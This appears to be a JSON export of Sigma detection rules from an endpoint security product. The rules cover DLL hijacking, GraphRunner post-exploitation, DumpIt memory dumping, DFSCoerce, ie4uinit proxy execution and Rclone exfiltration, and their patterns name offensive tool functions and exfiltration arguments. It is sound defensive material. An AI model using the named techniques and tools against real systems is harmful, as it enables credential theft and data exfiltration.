"content": "title: DLL Hijacking via ijplmui.exe\nid: 593ebf84-35d4-42cd-98e9-55d9df5f87a6\ndescription: |\n Detects potential Windows DLL Hijacking via ijplmui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ijplmui.exe'\n ImageLoaded|endswith: '\\IJPLMCOM.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Canon'\n - '?:\\Program Files (x86)\\Canon'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Canon'\n - '?:\\Program Files (x86)\\Canon'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Canon Inc.'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "593ebf84-35d4-42cd-98e9-55d9df5f87a6",
"rule_name": "DLL Hijacking via ijplmui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ijplmui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "593f465e-011d-4370-bd09-936ea5472337",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098853Z",
"creation_date": "2026-03-23T11:45:34.098855Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098859Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fxscover.yml",
"content": "title: DLL Hijacking via fxscover.exe\nid: 593f465e-011d-4370-bd09-936ea5472337\ndescription: |\n Detects potential Windows DLL Hijacking via fxscover.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fxscover.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\propsys.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "593f465e-011d-4370-bd09-936ea5472337",
"rule_name": "DLL Hijacking via fxscover.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fxscover.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59479067-dae2-49e6-828c-e6ed9a6e2a99",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097439Z",
"creation_date": "2026-03-23T11:45:34.097442Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097446Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_usoclient.yml",
"content": "title: DLL Hijacking via UsoClient.exe\nid: 59479067-dae2-49e6-828c-e6ed9a6e2a99\ndescription: |\n Detects potential Windows DLL Hijacking via UsoClient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'UsoClient'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\updatepolicy.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59479067-dae2-49e6-828c-e6ed9a6e2a99",
"rule_name": "DLL Hijacking via UsoClient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via UsoClient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59a0b168-6b3b-4b4c-8d06-7b2a204a55b8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606522Z",
"creation_date": "2026-03-23T11:45:34.606525Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606533Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/dafthack/GraphRunner",
"https://www.blackhillsinfosec.com/introducing-graphrunner/",
"https://www.invictus-ir.com/news/a-defenders-guide-to-graphrunner-part-i",
"https://www.invictus-ir.com/news/a-defenders-guide-to-graphrunner-part-ii"
],
"name": "t1087_graphrunner_usage.yml",
"content": "title: GraphRunner Post-Exploitation Toolset Executed\nid: 59a0b168-6b3b-4b4c-8d06-7b2a204a55b8\ndescription: |\n Detects the execution of GraphRunner, a post-exploitation toolset mostly written in PowerShell, designed to exploit Microsoft Entra ID (Azure AD) environments through Microsoft Graph API.\n The tool enables attackers to perform comprehensive tenant reconnaissance, establish persistence through malicious OAuth apps and security group manipulation, exfiltrate sensitive data from SharePoint, OneDrive, Teams, and Exchange Online.\n It is recommended to investigate the execution context, monitor for suspicious OAuth app registrations, review security group modifications, and analyze data access patterns for signs of exfiltration.\nreferences:\n - https://github.com/dafthack/GraphRunner\n - https://www.blackhillsinfosec.com/introducing-graphrunner/\n - https://www.invictus-ir.com/news/a-defenders-guide-to-graphrunner-part-i\n - https://www.invictus-ir.com/news/a-defenders-guide-to-graphrunner-part-ii\ndate: 2025/01/09\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1528\n - attack.collection\n - attack.t1114\n - attack.t1213\n - attack.persistence\n - attack.t1098.003\n - attack.discovery\n - attack.t1087.001\n - attack.t1087.004\n - attack.t1069.003\n - attack.exfiltration\n - attack.t1530\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.GraphRunner\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n - PowershellScriptPath|endswith: '\\GraphRunner.ps1'\n - PowershellCommand|contains|all:\n # Authentication Modules\n - 'Get-GraphTokens'\n - 'Invoke-RefreshGraphTokens '\n - 'Get-AzureAppTokens'\n - 'Invoke-RefreshAzureAppTokens'\n # Recon & Enumeration Modules\n - 'Invoke-GraphRecon'\n - 'Invoke-DumpCAPS'\n - 'Get-AzureADUsers '\n # Persistence Modules\n - 'Invoke-InjectOAuthApp'\n - 'Invoke-SecurityGroupCloner'\n - 'Invoke-AddGroupMember'\n # Pillage Modules\n - 'Invoke-SearchSharePointAndOneDrive'\n - 'Invoke-ImmersiveFileReader'\n - 'Invoke-SearchUserAttributes'\n # Invoke-GraphRunner Module\n - 'Invoke-GraphRunner'\n # Supplemental Modules\n - 'Invoke-AutoOAuthFlow'\n - 'Invoke-DeleteOAuthApp'\n - 'Invoke-DriveFileDownload'\n - 'Invoke-CheckAccess'\n - 'Invoke-ImportTokens'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59a0b168-6b3b-4b4c-8d06-7b2a204a55b8",
"rule_name": "GraphRunner Post-Exploitation Toolset Executed",
"rule_description": "Detects the execution of GraphRunner, a post-exploitation toolset mostly written in PowerShell, designed to exploit Microsoft Entra ID (Azure AD) environments through Microsoft Graph API.\nThe tool enables attackers to perform comprehensive tenant reconnaissance, establish persistence through malicious OAuth apps and security group manipulation, exfiltrate sensitive data from SharePoint, OneDrive, Teams, and Exchange Online.\nIt is recommended to investigate the execution context, monitor for suspicious OAuth app registrations, review security group modifications, and analyze data access patterns for signs of exfiltration.\n",
"rule_creation_date": "2025-01-09",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery",
"attack.exfiltration",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1069.003",
"attack.t1087.001",
"attack.t1087.004",
"attack.t1098.003",
"attack.t1114",
"attack.t1213",
"attack.t1528",
"attack.t1530"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59a2da9a-8334-4169-8886-427fec2a7c46",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069916Z",
"creation_date": "2026-03-23T11:45:34.069918Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069922Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_dumpit_executed.yml",
"content": "title: DumpIt Executed\nid: 59a2da9a-8334-4169-8886-427fec2a7c46\ndescription: |\n Detects the execution of a DumpIt binary, a tool used to create full memory dumps for forensic or diagnostic purposes on Windows systems.\n Attackers can use it to extract authentication secrets from memory and perform lateral movement within a network.\n It is recommended to analyze the execution chain associated with this alert to determine its legitimacy.\nreferences:\n - https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary\n - https://attack.mitre.org/techniques/T1003/\ndate: 2025/11/21\nmodified: 2025/11/25\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.DumpIt\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'DumpIt.exe'\n Name|contains: 'dumpit'\n\n exclusion_dfir_orc:\n - Image|endswith: '\\dumpit_x64.exe'\n CommandLine|contains: '\\Temp\\WorkingTemp\\'\n - ParentImage|endswith: '\\DFIR-Orc_x64.exe'\n CommandLine|contains: '\\Temp\\WorkingTemp\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59a2da9a-8334-4169-8886-427fec2a7c46",
"rule_name": "DumpIt Executed",
"rule_description": "Detects the execution of a DumpIt binary, a tool used to create full memory dumps for forensic or diagnostic purposes on Windows systems.\nAttackers can use it to extract authentication secrets from memory and perform lateral movement within a network.\nIt is recommended to analyze the execution chain associated with this alert to determine its legitimacy.\n",
"rule_creation_date": "2025-11-21",
"rule_modified_date": "2025-11-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59bfb123-6127-40af-9574-1ce62826ec93",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078475Z",
"creation_date": "2026-03-23T11:45:34.078477Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078481Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.praetorian.com/blog/how-to-detect-dfscoerce/",
"https://github.com/Wh04m1001/DFSCoerce",
"https://attack.mitre.org/techniques/T1187/"
],
"name": "t1187_dfscoerce.yml",
"content": "title: Possible DFSCoerce Attempt\nid: 59bfb123-6127-40af-9574-1ce62826ec93\ndescription: |\n Detects all attempts to remove or add a DFS namespace which could be indicative of a DFSCoerce attack.\n DFSCoerce is an NTLM relay attack that abuses the MS-DFSNM protocol to coerce a Domain Controller into authenticating against an attacker-controlled server, enabling an unauthorised user to escalate privileges to domain admin.\n The two RPC methods 'NetrDfsRemoveStdRoot' and 'NetrDfsAddStdRoot' can be used to coerce a host to authenticate to an arbitrary server.\n It is recommended to check the server name IP address and the root share name to determine the legitimacy of this action.\nreferences:\n - https://www.praetorian.com/blog/how-to-detect-dfscoerce/\n - https://github.com/Wh04m1001/DFSCoerce\n - https://attack.mitre.org/techniques/T1187/\ndate: 2025/06/13\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1187\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.DFSCoerce\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.ActiveDirectory\nlogsource:\n product: windows\n category: eventlog\ndetection:\n selection:\n LogName: 'Microsoft-Windows-DFSN-Server/Admin'\n EventID:\n - 515 # NetrDfsRemoveStdRoot\n - 514 # NetrDfsAddStdRoot\n AgentOsProductType: 'server dc'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59bfb123-6127-40af-9574-1ce62826ec93",
"rule_name": "Possible DFSCoerce Attempt",
"rule_description": "Detects all attempts to remove or add a DFS namespace which could be indicative of a DFSCoerce attack.\nDFSCoerce is an NTLM relay attack that abuses the MS-DFSNM protocol to coerce a Domain Controller into authenticating against an attacker-controlled server, enabling an unauthorised user to escalate privileges to domain admin.\nThe two RPC methods 'NetrDfsRemoveStdRoot' and 'NetrDfsAddStdRoot' can be used to coerce a host to authenticate to an arbitrary server.\nIt is recommended to check the server name IP address and the root share name to determine the legitimacy of this action.\n",
"rule_creation_date": "2025-06-13",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1187"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59c50f51-8b62-4a82-872d-9ce2c6519792",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087722Z",
"creation_date": "2026-03-23T11:45:34.087724Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087729Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/",
"https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_ie4uinit_proxy_execution.yml",
"content": "title: Proxy Execution via ie4uinit\nid: 59c50f51-8b62-4a82-872d-9ce2c6519792\ndescription: |\n Detects an execution of ie4uinit.exe in an unusual folder.\n The Windows binary ie4uinit.exe can be used to execute code from a maliciously crafted ie4uinit.inf file.\n Adversaries can use this utility to proxy the execution of malicious code and make their actions stealthier.\n It is recommended to investigate the ie4uinit.inf file in the ie4uinit.exe folder and any other malicious activities on the machine.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/\n - https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2024/12/03\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Ie4uinit\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'Ie4uinit.exe'\n\n filter_legitimate:\n Image:\n - '?:\\windows\\system32\\ie4uinit.exe'\n - '?:\\windows\\sysWOW64\\ie4uinit.exe'\n\n exclusion_iVMS:\n CommandLine: '?:\\Users\\\\*\\AppData\\Local\\Temp\\InstallationTempFile\\ie4uinit.exe -ClearIconCache'\n Ancestors|contains: '\\iVMS-4200V'\n\n exclusion_hikvision:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\InstallationTempFile\\ie4uinit.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Hangzhou Hikvision Digital Tech.Co.,Ltd'\n\n exclusion_ossia:\n ProcessImage:\n - '?:\\Program Files (x86)\\Ossia VMS Standard\\Client\\ie4uinit.exe'\n - '?:\\Program Files (x86)\\Ossia VMS Standard\\Server\\ie4uinit.exe'\n\n exclusion_safire:\n ProcessImage:\n - '?:\\Program Files (x86)\\Safire Smart VMS lite\\Client\\ie4uinit.exe'\n - '?:\\Program Files (x86)\\Safire Smart VMS lite\\Server\\ie4uinit.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Chipspoint Electronics Co., Ltd.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59c50f51-8b62-4a82-872d-9ce2c6519792",
"rule_name": "Proxy Execution via ie4uinit",
"rule_description": "Detects an execution of ie4uinit.exe in an unusual folder.\nThe Windows binary ie4uinit.exe can be used to execute code from a maliciously crafted ie4uinit.inf file.\nAdversaries can use this utility to proxy the execution of malicious code and make their actions stealthier.\nIt is recommended to investigate the ie4uinit.inf file in the ie4uinit.exe folder and any other malicious activities on the machine.\n",
"rule_creation_date": "2024-12-03",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59d486f3-7e80-472f-ba5f-6094fb3585d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611170Z",
"creation_date": "2026-03-23T11:45:34.611174Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611181Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/rclone-mega-extortion/",
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://attack.mitre.org/techniques/T1567/002/"
],
"name": "t1567_002_suspicious_rclone.yml",
"content": "title: Suspicious Rclone Execution\nid: 59d486f3-7e80-472f-ba5f-6094fb3585d9\ndescription: |\n Detects an execution of Rclone with command-line arguments often seen on exfiltration scenarios.\n Attackers can use Rclone to exfiltrate data to an external server before deploying a ransomware.\n It is recommended to investigate the target location specified in the Rclone command-line, as well as which data was cloned to determine if this action was legitimate.\nreferences:\n - https://redcanary.com/blog/rclone-mega-extortion/\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://attack.mitre.org/techniques/T1567/002/\ndate: 2021/09/30\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567.002\n - attack.t1048.002\n - attack.t1048.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Rclone\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_rclone:\n - OriginalFileName: 'rclone.exe'\n - Image|endswith: '\\rclone.exe'\n\n selection_variant_suspicious_destination:\n CommandLine|contains:\n - 'ftp:'\n - 'sftp:'\n - 'remote:'\n - 'mega:'\n - 'gdrive:'\n - 'pcloud:'\n - 'dropbox:'\n - 's3:'\n - 'webdav:'\n\n selection_variant_suspicious_flags:\n CommandLine|contains:\n - '--config'\n - '--no-check-certificate'\n\n condition: selection_rclone and 1 of selection_variant_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59d486f3-7e80-472f-ba5f-6094fb3585d9",
"rule_name": "Suspicious Rclone Execution",
"rule_description": "Detects an execution of Rclone with command-line arguments often seen on exfiltration scenarios.\nAttackers can use Rclone to exfiltrate data to an external server before deploying a ransomware.\nIt is recommended to investigate the target location specified in the Rclone command-line, as well as which data was cloned to determine if this action was legitimate.\n",
"rule_creation_date": "2021-09-30",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
